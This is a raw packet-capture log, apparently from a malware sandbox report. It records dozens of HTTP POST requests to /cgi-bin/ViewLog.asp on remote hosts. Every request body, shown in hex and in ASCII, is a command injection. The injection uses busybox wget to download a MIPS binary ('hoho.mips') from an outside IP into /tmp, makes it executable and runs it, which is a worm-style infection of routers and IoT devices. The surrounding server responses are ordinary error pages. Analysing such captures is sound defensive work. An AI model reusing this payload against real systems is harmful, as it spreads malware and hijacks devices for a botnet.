                                              Session IDSource IPSource PortDestination IPDestination Port
                                              259192.168.2.134355662.173.152.1748080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.909446955 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.140130997 CET293INHTTP/1.1 404 Not Found
                                              Server: Apache-Coyote/1.1
                                              Set-Cookie: FCSESSIONID=9CDF331A8262E9F212B783E50D57FF9A; Path=/; HttpOnly
                                              Content-Type: text/html;charset=UTF-8
                                              Content-Length: 2833
                                              Date: Thu, 23 Nov 2023 04:16:18 GMT


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              260192.168.2.134283495.211.242.1068080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.919853926 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:18.127804041 CET552INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:16:18 GMT
                                              Server: Apache/2.4.25 (Debian)
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              261192.168.2.133671631.200.125.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.939512968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              262192.168.2.133649294.120.31.218080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.960352898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              263192.168.2.134359862.29.49.488080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.960992098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              264192.168.2.133750894.64.184.08080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:17.963525057 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              265192.168.2.133822231.136.156.1108080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.414766073 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:24.614475965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:30.758554935 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:42.790446043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.646486998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:57.798219919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              266192.168.2.135370262.28.70.1898080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.416621923 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:21.612725019 CET680INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 431
                                              Date: Thu, 23 Nov 2023 04:16:20 GMT
                                              Keep-Alive: timeout=5
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              267192.168.2.133937494.120.226.2358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.442334890 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              268192.168.2.135275831.136.185.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:21.602286100 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:22.182482004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.334492922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:25.638480902 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:30.246556997 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:39.462485075 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.406400919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:35.270287037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
